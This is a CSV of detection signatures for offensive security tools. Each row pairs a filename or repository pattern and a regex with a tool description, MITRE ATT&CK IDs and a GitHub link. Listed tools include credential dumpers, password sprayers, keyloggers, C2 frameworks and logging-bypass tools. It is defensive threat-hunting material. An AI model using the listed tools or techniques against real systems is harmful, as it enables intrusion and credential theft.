"*offensive_notion.exe*",".{0,1000}offensive_notion\.exe.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*offensive_notion_darwin_*",".{0,1000}offensive_notion_darwin_.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*offensive_notion_linux_*",".{0,1000}offensive_notion_linux_.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*offensive_notion_win_*.exe*",".{0,1000}offensive_notion_win_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","OffensiveNotion","Notion (yes the notetaking app) as a C2.","T1090 - T1090.002 - T1071 - T1071.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/mttaggart/OffensiveNotion","1","1","N/A","10","10","1049","114","2023-05-21T13:24:01Z","2022-01-18T16:39:54Z" "*OffensiveCSharp*DriverQuery*",".{0,1000}OffensiveCSharp.{0,1000}DriverQuery.{0,1000}","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*OffensiveCSharp*ETWEventSubscription*",".{0,1000}OffensiveCSharp.{0,1000}ETWEventSubscription.{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. 
When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*OffensiveCSharp-master*",".{0,1000}OffensiveCSharp\-master.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*OffensiveLua-main*",".{0,1000}OffensiveLua\-main.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*office2john.py*",".{0,1000}office2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*office365userenum.*",".{0,1000}office365userenum\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Office-DDE-Payloads*",".{0,1000}Office\-DDE\-Payloads.{0,1000}","offensive_tool_keyword","Office-DDE-Payloads","Collection of scripts and templates to generate Word and Excel documents embedded with the DDE. macro-less command execution technique described by @_staaldraad and @0x5A1F (blog post link in References section below). 
Intended for use during sanctioned red team engagements and/or phishing campaigns.","T1221 - T1222 - T1223","TA0001 - TA0002 - TA0003","N/A","N/A","Phishing","https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads","1","1","N/A","N/A","7","623","162","2023-07-16T08:22:24Z","2017-10-27T22:19:17Z" "*Offline_WinPwn.ps1*",".{0,1000}Offline_WinPwn\.ps1.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*offlinereg-win32.exe*",".{0,1000}offlinereg\-win32\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*offlinereg-win64.exe*",".{0,1000}offlinereg\-win64\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*offsecginger/koadic*",".{0,1000}offsecginger\/koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*OFTC/tor2web/*",".{0,1000}OFTC\/tor2web\/.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*OgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA=*",".{0,1000}OgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABFAHYAZQBuAHQAVgBpAGUAdwBlAHIAUgBDAEUALgBwAHMAMQA\=.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*OG-Sadpanda/SharpCat*",".{0,1000}OG\-Sadpanda\/SharpCat.{0,1000}","offensive_tool_keyword","cobaltstrike","C# alternative to the linux cat command... Prints file contents to console. 
For use with Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpCat","1","1","N/A","10","10","17","3","2021-07-15T15:01:02Z","2021-07-15T14:57:53Z" "*OG-Sadpanda/SharpSword*",".{0,1000}OG\-Sadpanda\/SharpSword.{0,1000}","offensive_tool_keyword","cobaltstrike","Read the contents of DOCX files using Cobalt Strike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","10","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*OG-Sadpanda/SharpSword*",".{0,1000}OG\-Sadpanda\/SharpSword.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","1","N/A","8","10","114","12","2023-08-22T20:16:28Z","2021-07-15T14:50:05Z" "*OG-Sadpanda/SharpZippo*",".{0,1000}OG\-Sadpanda\/SharpZippo.{0,1000}","offensive_tool_keyword","cobaltstrike","List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpZippo","1","1","N/A","10","10","59","10","2022-05-24T15:57:33Z","2022-05-24T15:52:31Z" "*Oh365UserFinder.git*",".{0,1000}Oh365UserFinder\.git.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","496","86","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" "*oh365userfinder.py*",".{0,1000}oh365userfinder\.py.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","496","86","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" "*Oh365UserFinder-main*",".{0,1000}Oh365UserFinder\-main.{0,1000}","offensive_tool_keyword","Oh365UserFinder","Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. 
The tool parses responses to identify the IfExistsResult flag is null or not. and responds appropriately if the user is valid. The tool will attempt to identify false positives based on response. and either automatically create a waiting period to allow the throttling value to reset. or warn the user to increase timeouts between attempts.","T1595 - T1592 - T1589 - T1591 - T1598","TA0004 - TA0005 - TA0010","N/A","N/A","Reconnaissance","https://github.com/dievus/Oh365UserFinder","1","1","N/A","N/A","5","496","86","2023-03-21T15:59:54Z","2021-11-16T22:59:04Z" "*oh-az/NoArgs*",".{0,1000}oh\-az\/NoArgs.{0,1000}","offensive_tool_keyword","NoArgs","NoArgs is a tool designed to dynamically spoof and conceal process arguments while staying undetected. It achieves this by hooking into Windows APIs to dynamically manipulate the Windows internals on the go. This allows NoArgs to alter process arguments discreetly.","T1055 - T1574 - T1112 - T1056","TA0005 - TA0040 - TA0009","N/A","N/A","Defense Evasion","https://github.com/oh-az/NoArgs","1","1","N/A","8","2","130","24","2024-03-17T04:43:11Z","2024-03-15T16:54:49Z" "*ojggmchlghnjlapmfbnjholfjkiidbch*",".{0,1000}ojggmchlghnjlapmfbnjholfjkiidbch.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Okta-Password-Sprayer*",".{0,1000}Okta\-Password\-Sprayer.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","1","N/A","10","1","64","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z" 
"*oldboy21/LDAP-Password-Hunter*",".{0,1000}oldboy21\/LDAP\-Password\-Hunter.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","7","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*oldboy21/SMBAT*",".{0,1000}oldboy21\/SMBAT.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*oldboy21/SMBSR*",".{0,1000}oldboy21\/SMBSR.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*OLDNamedPipeServer.ps1*",".{0,1000}OLDNamedPipeServer\.ps1.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*OleViewDotNet.psd1*",".{0,1000}OleViewDotNet\.psd1.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*Oliver-1-1/GhostMapper*",".{0,1000}Oliver\-1\-1\/GhostMapper.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","8","2","175","49","2024-03-28T14:49:11Z","2023-10-31T11:26:33Z" "*OlivierLaflamme/PyExec*",".{0,1000}OlivierLaflamme\/PyExec.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "*OmerYa/Invisi-Shell*",".{0,1000}OmerYa\/Invisi\-Shell.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. 
The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","1","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*-OMG-Credz-Plz*",".{0,1000}\-OMG\-Credz\-Plz.{0,1000}","offensive_tool_keyword","OMG-Credz-Plz","A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.","T1056.002 - T1566.001 - T1567.002","TA0004 - TA0040 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/-OMG-Credz-Plz","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*OMGdump.zip*",".{0,1000}OMGdump\.zip.{0,1000}","offensive_tool_keyword","SamDumpCable","Dump users sam and system hive and exfiltrate them","T1003.002 - T1564.001","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/SamDumpCable","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*OMGLoggerDecoder*",".{0,1000}OMGLoggerDecoder.{0,1000}","offensive_tool_keyword","OMGLogger","Key logger which sends each and every key stroke of target remotely/locally.","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*omg-payloads*/payloads/*",".{0,1000}omg\-payloads.{0,1000}\/payloads\/.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" 
"*omg-payloads-master*",".{0,1000}omg\-payloads\-master.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*OmriBaso/BesoToken*",".{0,1000}OmriBaso\/BesoToken.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","10","1","93","13","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z" "*On_Demand_C2.*",".{0,1000}On_Demand_C2\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*On-Demand_C2_BOF.*",".{0,1000}On\-Demand_C2_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*OnDemandC2Class.cs*",".{0,1000}OnDemandC2Class\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 
- T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","318","52","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" "*onecloudemoji/CVE-2022-30190*",".{0,1000}onecloudemoji\/CVE\-2022\-30190.{0,1000}","offensive_tool_keyword","POC","CVE-2022-30190 Follina POC","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/onecloudemoji/CVE-2022-30190","1","1","N/A","N/A","2","106","29","2022-05-31T09:35:37Z","2022-05-31T06:45:25Z" "*OneDrive Enumerator*",".{0,1000}OneDrive\sEnumerator.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","6","553","72","2024-04-05T17:19:50Z","2019-03-05T08:54:38Z" "*onedrive_enum.py*",".{0,1000}onedrive_enum\.py.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","6","553","72","2024-04-05T17:19:50Z","2019-03-05T08:54:38Z" "*onedrive_exports_version_dll.txt*",".{0,1000}onedrive_exports_version_dll\.txt.{0,1000}","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - 
T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","5","429","52","2023-12-19T22:58:03Z","2023-05-15T13:02:54Z" "*onedrive_user_enum.git*",".{0,1000}onedrive_user_enum\.git.{0,1000}","offensive_tool_keyword","onedrive_user_enum","enumerate valid onedrive users","T1087 - T1110","TA0006","N/A","N/A","Network Exploitation tools","https://github.com/nyxgeek/onedrive_user_enum","1","1","N/A","N/A","6","553","72","2024-04-05T17:19:50Z","2019-03-05T08:54:38Z" "*One-Lin3r*",".{0,1000}One\-Lin3r.{0,1000}","offensive_tool_keyword","One-Lin3r","One-Lin3r is simple modular and light-weight framework gives you all the one-liners that you will need while penetration testing (Windows. Linux. macOS or even BSD systems) or hacking generally with a lot of new features to make all of this fully automated (ex: you won't even need to copy the one-liners).","T1059 - T1003 - T1053","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/D4Vinci/One-Lin3r","1","1","N/A","N/A","10","1640","292","2022-02-10T18:17:57Z","2018-01-14T21:26:04Z" "*onesixtyone -c 